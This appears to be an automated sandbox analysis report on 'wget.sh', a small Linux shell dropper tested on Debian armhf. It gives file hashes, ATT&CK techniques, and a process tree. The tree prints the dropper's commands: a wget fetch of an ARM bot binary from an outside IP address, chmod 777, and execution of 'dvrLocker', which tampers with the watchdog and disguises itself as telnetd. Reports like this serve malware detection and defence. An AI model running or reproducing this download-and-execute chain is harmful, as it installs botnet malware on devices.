bd6ee818b79172a3d43e87463157ee94c942a321fd2ed582610962e323d0817a

Analysis

max time kernel
149s
max time network
112s
platform
debian-9_armhf
resource
debian9-armhf-20240729-en
resource tags

arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
18/10/2024, 09:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

wget.sh
Size

420B
MD5

878878ef9a55d128c2917bfb365e4261
SHA1

3f95d013d7602c813cafd4be15c43c37a9c71d2e
SHA256

bd6ee818b79172a3d43e87463157ee94c942a321fd2ed582610962e323d0817a
SHA512

dfb89655ef3662bb93b765211863cdff5101a00edf9f45b741e8c401402ec429196cf97b4c4e54dfbfc7153b3c50c2ae9da5e3fab45d51a96f0f25ca6c365cf6

Score

7^/10

credential_access defense_evasion

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 3 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
677	chmod
682	chmod
694	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/mnt/dvrLocker	678	dvrLocker

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	dvrLocker
File opened for modification	/dev/misc/watchdog	dvrLocker

Renames itself 2 IoCs

pid	Process
678	dvrLocker
678	dvrLocker

Reads process memory 1 TTPs 1 IoCs

Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

credential_access

Proc Filesystem

T1003.007

description	ioc	Process
File opened for reading	/proc/1/maps	dvrLocker

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	telnetd	678	dvrLocker

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/.cc	wget.sh

/tmp/wget.sh
/tmp/wget.sh
1⤵
- Writes file to tmp directory
PID:647
- /bin/rm
  rm -rf dvrLocker
  2⤵
  PID:648
- /usr/bin/wget
  wget http://103.149.87.69/a/b/la.bot.arm -O -
  2⤵
  PID:650
- /bin/chmod
  chmod 777 dvrLocker
  2⤵
  - File and Directory Permissions Modification
  PID:677
- /mnt/dvrLocker
  ./dvrLocker
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Renames itself
  - Reads process memory
  - Changes its process name
  PID:678
- /bin/chmod
  chmod 777 dvrLocker
  2⤵
  - File and Directory Permissions Modification
  PID:682
- /bin/chmod
  chmod 777 dvrLocker
  2⤵
  - File and Directory Permissions Modification
  PID:694
- /bin/rm
  rm -rf dvrLocker
  2⤵
  PID:708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

OS Credential Dumping

T1003

Proc Filesystem

T1003.007

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/mnt/dvrLocker

Filesize
54KB

MD5
be76a190f3b90d5cb00a5cbc15b112a4

SHA1
da8903c31f36952390ff4975683504b9ceff05ea

SHA256
9258876ed0aaf0ff28b2b68c5e1ebac8680d7dc8b5de2f67e198035b1f1d545e

SHA512
0ef32ef56b4cd888974fc1e900be3956ef23e447b4efb3c1231b11dd77596455b9a5f2927c11f2380308deeb5e97b1a8afd76c350d2d70daea9c1b862934b771

Download Submit